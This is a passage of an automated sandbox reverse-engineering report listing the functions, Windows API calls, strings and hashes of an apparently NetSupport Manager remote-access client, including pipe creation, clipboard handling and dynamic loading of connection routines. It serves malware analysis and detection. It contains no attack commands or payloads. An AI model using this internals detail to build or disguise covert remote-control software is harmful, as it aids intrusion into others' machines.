                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                      • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                    • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                    • _sprintf.LIBCMT ref: 1103B2BB
                                                                                    • _fputs.LIBCMT ref: 1103B330
                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                    • _free.LIBCMT ref: 1103B336
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                    • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 383231468-3762817415
                                                                                    • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                    • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                    • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                    • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                    Function 110CB2B0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                    • IsIconic.USER32(00000001), ref: 110CB349
                                                                                    • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                    • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                    • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                    • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                    • API String ID: 2655531791-1552842965
                                                                                    • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                    • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                    • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                    • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                    Function 110F33F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                    • GetLastError.KERNEL32 ref: 110F3470
                                                                                    • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                    • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                    • pSD, xrefs: 110F3415
                                                                                    • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                    • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                    • API String ID: 3134831419-838605531
                                                                                    • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                    • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                    • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                    • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                    Function 11033010 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                    • API String ID: 0-293745777
                                                                                    • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                    • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                    • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                    • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                    Function 11093080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                    • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                      • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                      • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                      • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                      • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                      • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                      • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                      • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                      • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                      • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                      • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                    • String ID: NSMClassList$NSMFindClassEvent
                                                                                    • API String ID: 1622498684-2883797795
                                                                                    • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                    • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                    • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                    • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                    Function 1115B1D0 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                      • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                    • _memset.LIBCMT ref: 1115B266
                                                                                    • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                    • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                    • GetDesktopWindow.USER32 ref: 1115B309
                                                                                    • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2935161463-0
                                                                                    • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                    • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                    • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                    • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                    Function 11063160 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                    • API String ID: 1096595926-1306570422
                                                                                    • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                    • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                    • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                    • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                    Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                      • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                      • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                    • wsprintfA.USER32 ref: 1100548D
                                                                                    • DeleteObject.GDI32(?), ref: 110054E2
                                                                                    • DeleteObject.GDI32(?), ref: 110054EB
                                                                                    • SelectObject.GDI32(?,?), ref: 11005502
                                                                                    • DeleteObject.GDI32(?), ref: 11005508
